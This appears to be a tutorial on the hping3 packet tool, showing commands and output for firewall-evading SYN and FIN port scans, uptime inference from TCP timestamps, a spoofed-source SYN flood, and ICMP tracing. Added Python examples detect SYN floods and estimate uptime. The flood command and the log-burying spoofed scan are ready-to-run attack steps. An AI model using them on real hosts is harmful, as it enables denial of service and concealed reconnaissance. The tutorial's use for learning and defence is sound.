hping3

Some handy uses of hping3, a tool that can be put to all sorts of work: checking firewall behaviour, port scanning, DoS attacks and so on.

SYN scan of the well-known ports
Pin the source port to 88 to get through the firewall, and mix in packets with spoofed source addresses to bury the target's logs.
Roughly the same as nmap -g 88 -sS -D ip,ip,ME,ip 10.0.1.1 -p1-1023
# hping3 -8 1-1023 -S 10.0.1.1 -s 88 --rand-source --fast
Scanning 10.0.1.1 (10.0.1.1), port 1-1023
1024 ports to scan, use -V to see all the replies
+----+-----------+---------+---+-----+-----+-----+
|port| serv name |  flags  |ttl| id  | win | len |
+----+-----------+---------+---+-----+-----+-----+
   21 ftp        : .S..A... 64     0  5840    46
   53 domain     : .S..A... 64     0  5840    46
   80 www        : .S..A... 64     0  5840    46
  139 netbios-ssn: .S..A... 64     0  5840    46
  445 microsoft-d: .S..A... 64     0  5840    46
All replies received. Done.


FIN scan
Roughly the same as nmap -sF 10.0.1.1 -p1-1023
# hping3 -8 1-1023 -F 10.0.1.1
Scanning 10.0.1.1 (10.0.1.1), port 1-1023
1024 ports to scan, use -V to see all the replies
+----+-----------+---------+---+-----+-----+-----+
|port| serv name |  flags  |ttl| id  | win | len |
+----+-----------+---------+---+-----+-----+-----+
All replies received. Done.
Not responding ports: (21 ftp) (53 domain) (80 www) (139 netbios-ssn) (445 microsoft-d)


Send SYN packets to an open port and read the TCP timestamps
# hping3 -S -p 21 --tcp-timestamp 10.0.1.1
HPING 10.0.1.1 (wlan0 10.0.1.1): S set, 40 headers + 0 data bytes
len=56 ip=10.0.1.1 ttl=64 DF id=0 sport=21 flags=SA seq=0 win=5792 rtt=2.4 ms
TCP timestamp: tcpts=189213915

len=56 ip=10.0.1.1 ttl=64 DF id=0 sport=21 flags=SA seq=1 win=5792 rtt=2.3 ms
TCP timestamp: tcpts=189214015
HZ seems hz=100
System uptime seems: 21 days, 21 hours, 35 minutes, 40 seconds
^C
--- 10.0.1.1 hping statistic ---
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 2.0/2.3/2.4 ms
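As an added example (not from the original post), the "HZ seems" and "System uptime seems" lines above can be reproduced from the two tcpts values: the difference over one second gives the clock rate, and tcpts divided by that rate gives seconds since the timestamp clock started. The one-second spacing of the samples is an assumption taken from hping3's default send interval.

```python
"""Estimate remote uptime from two TCP timestamp (tcpts) samples.

Added example, not from the original post. The tcpts values are the two
hping3 printed above, assumed to be one second apart (hping3's default send
interval). A timestamp clock that starts at zero on boot leaks uptime, and
with it a rough patch cadence; kernels that randomize the per-connection
timestamp offset make this estimate meaningless, which is the mitigation.
"""

# Tick rates commonly used for the TCP timestamp clock.
KNOWN_HZ = (100, 250, 1000)

# Constructed from the run above: (seconds since first probe, tcpts value).
SAMPLES = [(0.0, 189213915), (1.0, 189214015)]


def estimate_hz(samples):
    """Infer the timestamp clock rate from the first and last sample."""
    (t0, ts0), (t1, ts1) = samples[0], samples[-1]
    if t1 <= t0:
        raise ValueError("samples must span a positive time interval")
    rate = (ts1 - ts0) / (t1 - t0)
    # Snap to the nearest well-known HZ. A large residual points to a
    # randomized offset, a wrapped counter or a non-standard clock, so
    # refuse to guess rather than report a bogus uptime.
    hz = min(KNOWN_HZ, key=lambda h: abs(h - rate))
    if abs(hz - rate) > 0.1 * hz:
        raise ValueError(f"rate {rate:.1f} ticks/s matches no known HZ")
    return hz


def uptime_seconds(samples, hz=None):
    """Whole seconds since the timestamp clock started (boot, if unrandomized)."""
    hz = hz or estimate_hz(samples)
    return samples[-1][1] // hz


def format_uptime(seconds):
    """Render seconds the way hping3 prints 'System uptime seems'."""
    days, rem = divmod(seconds, 86400)
    hours, rem = divmod(rem, 3600)
    minutes, secs = divmod(rem, 60)
    return f"{days} days, {hours} hours, {minutes} minutes, {secs} seconds"


if __name__ == "__main__":
    hz = estimate_hz(SAMPLES)
    print(f"HZ seems hz={hz}")
    print("System uptime seems:", format_uptime(uptime_seconds(SAMPLES, hz)))
```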


SYN flood attack
Spoof the source address with --rand-source, fragment the packets with -f, and send them as fast as possible with --flood
# hping3 -f -S 10.0.1.1 -p 80 --rand-source --flood
HPING 10.0.1.1 (wlan0 10.0.1.1): S set, 40 headers + 0 data bytes
hping in flood mode, no replies will be shown
^C
--- 10.0.1.1 hping statistic ---
17361 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms


netstat on the receiving machine shows connections in SYN_RECV from all sorts of IPs.
Per the RFC, a host that receives a SYN replies with SYN+ACK and then waits for the peer's reply, but
the source address is spoofed, so that reply never arrives and the resources can't be released until the timeout. Hell.
# netstat -atn
tcp        0      0 10.0.1.1:80             253.218.178.150:2143    SYN_RECV
tcp        0      0 10.0.1.1:80             121.153.69.169:2842     SYN_RECV
tcp        0      0 10.0.1.1:80             142.144.231.59:2849     SYN_RECV
tcp        0      0 10.0.1.1:80             147.160.78.241:2866     SYN_RECV
tcp        0      0 10.0.1.1:80             160.54.46.25:2856       SYN_RECV
tcp        0      0 10.0.1.1:80             187.158.78.27:2864      SYN_RECV
tcp        0      0 10.0.1.1:80             56.51.76.247:2142       SYN_RECV
tcp        0      0 10.0.1.1:80             73.46.17.208:2841       SYN_RECV
tcp        0      0 10.0.1.1:80             153.177.8.196:2869      SYN_RECV
:
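A defender-side check for the pattern in the netstat output above, as an added example that is not from the original post: it counts half-open connections per listening socket and flags the spoofed-flood signature (a large backlog where almost every remote address is different). The sample lines are constructed from the output above plus one ESTABLISHED line, and the thresholds are illustrative.

```python
"""Flag a SYN flood from `netstat -atn` output.

Added example, not from the original post. It parses netstat lines like the
ones above (embedded here as a constructed sample, plus one ESTABLISHED line
for contrast), counts half-open (SYN_RECV) connections per local socket, and
reports sockets where the count crosses a threshold and nearly every remote
address differs, which is what a spoofed-source flood looks like. The default
threshold is deliberately low so the nine sample lines trigger it.
"""
from collections import defaultdict

NETSTAT_SAMPLE = """\
tcp        0      0 10.0.1.1:80             253.218.178.150:2143    SYN_RECV
tcp        0      0 10.0.1.1:80             121.153.69.169:2842     SYN_RECV
tcp        0      0 10.0.1.1:80             142.144.231.59:2849     SYN_RECV
tcp        0      0 10.0.1.1:80             147.160.78.241:2866     SYN_RECV
tcp        0      0 10.0.1.1:80             160.54.46.25:2856       SYN_RECV
tcp        0      0 10.0.1.1:80             187.158.78.27:2864      SYN_RECV
tcp        0      0 10.0.1.1:80             56.51.76.247:2142       SYN_RECV
tcp        0      0 10.0.1.1:80             73.46.17.208:2841       SYN_RECV
tcp        0      0 10.0.1.1:80             153.177.8.196:2869      SYN_RECV
tcp        0      0 10.0.1.1:22             10.0.1.50:51234         ESTABLISHED
"""


def half_open_by_socket(netstat_text):
    """Map local socket -> [SYN_RECV count, set of remote IPs]."""
    stats = defaultdict(lambda: [0, set()])
    for line in netstat_text.splitlines():
        fields = line.split()
        # netstat -atn columns: proto recv-q send-q local remote state
        if len(fields) < 6 or not fields[0].startswith("tcp") or fields[5] != "SYN_RECV":
            continue
        local, remote = fields[3], fields[4]
        stats[local][0] += 1
        stats[local][1].add(remote.rsplit(":", 1)[0])  # drop the remote port
    return stats


def detect_syn_flood(netstat_text, threshold=5, distinct_ratio=0.9):
    """Return (local socket, half-open count, distinct remote IPs) per alert."""
    alerts = []
    for local, (count, ips) in half_open_by_socket(netstat_text).items():
        if count >= threshold and len(ips) / count >= distinct_ratio:
            alerts.append((local, count, len(ips)))
    return sorted(alerts)


if __name__ == "__main__":
    for local, count, distinct in detect_syn_flood(NETSTAT_SAMPLE):
        print(f"{local}: {count} half-open connections from {distinct} addresses")
```

When this fires, the useful response is to confirm SYN cookies are enabled (net.ipv4.tcp_syncookies=1) and to shorten the SYN_RECV retry budget, not to block the remote addresses, which are spoofed.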


Send ICMP packets with the TTL stepping up 1, 2, 3, ... and show each host that returned ICMP Time Exceeded.
Same as tracepath or tracert
# hping3 -1 -T nsa.gov
HPING nsa.gov (wlan0 12.120.184.8): icmp mode set, 28 headers + 0 data bytes
hop=1 TTL 0 during transit from ip=10.255.0.1 name=ntt.setup
hop=1 hoprtt=1.2 ms
hop=2 ***
hop=2 hoprtt=6.3 ms
hop=3 ***
hop=3 hoprtt=13.5 ms
hop=4 ***
hop=4 hoprtt=10.6 ms
hop=5 ***
hop=5 hoprtt=47.9 ms
hop=6 TTL 0 during transit from ip=61.213.161.17 name=xe-5-0-3.a21.tokyjp01.jp.ra.gin.ntt.net
hop=6 hoprtt=9.6 ms
hop=7 TTL 0 during transit from ip=61.213.162.165 name=ae-7.r24.tokyjp01.jp.bb.gin.ntt.net
hop=7 hoprtt=13.4 ms
hop=8 TTL 0 during transit from ip=129.250.2.92 name=ae-9.r20.tokyjp01.jp.bb.gin.ntt.net
hop=8 hoprtt=33.7 ms
hop=9 TTL 0 during transit from ip=129.250.4.189 name=as-1.r20.sttlwa01.us.bb.gin.ntt.net
hop=9 hoprtt=108.7 ms
hop=10 TTL 0 during transit from ip=129.250.5.43 name=ae-1.r04.sttlwa01.us.bb.gin.ntt.net
hop=10 hoprtt=130.6 ms
hop=11 TTL 0 during transit from ip=192.205.34.117 name=UNKNOWN
hop=11 hoprtt=169.1 ms
hop=12 TTL 0 during transit from ip=12.122.84.18 name=cr82.st0wa.ip.att.net
hop=12 hoprtt=126.3 ms
hop=13 TTL 0 during transit from ip=12.122.5.230 name=cr2.ptdor.ip.att.net
hop=13 hoprtt=157.4 ms
hop=14 TTL 0 during transit from ip=12.122.30.141 name=cr1.ptdor.ip.att.net
hop=14 hoprtt=142.2 ms
hop=15 TTL 0 during transit from ip=12.122.30.146 name=cr1.sffca.ip.att.net
hop=15 hoprtt=132.8 ms
hop=16 TTL 0 during transit from ip=12.122.3.122 name=cr1.la2ca.ip.att.net
hop=16 hoprtt=122.0 ms
hop=17 TTL 0 during transit from ip=12.123.30.101 name=UNKNOWN
hop=17 hoprtt=141.1 ms
len=46 ip=12.120.184.8 ttl=50 id=32645 icmp_seq=20 rtt=150.9 ms
len=46 ip=12.120.184.8 ttl=51 id=33347 icmp_seq=21 rtt=150.9 ms
len=46 ip=12.120.184.8 ttl=50 id=33634 icmp_seq=22 rtt=145.7 ms
len=46 ip=12.120.184.8 ttl=51 id=33891 icmp_seq=23 rtt=137.5 ms
^C
--- nsa.gov hping statistic ---
25 packets transmitted, 24 packets received, 4% packet loss
round-trip min/avg/max = 1.2/92.9/169.1 ms


ICMP Echo Request with the TTL set to 17
# hping3 -1 nsa.gov -t 17
HPING nsa.gov (wlan0 12.120.186.8): icmp mode set, 28 headers + 0 data bytes
len=46 ip=12.120.186.8 ttl=50 id=25901 icmp_seq=0 rtt=120.4 ms
len=46 ip=12.120.186.8 ttl=51 id=26120 icmp_seq=1 rtt=124.0 ms
^C
--- nsa.gov hping statistic ---
3 packets transmitted, 2 packets received, 34% packet loss
round-trip min/avg/max = 120.4/122.2/124.0 ms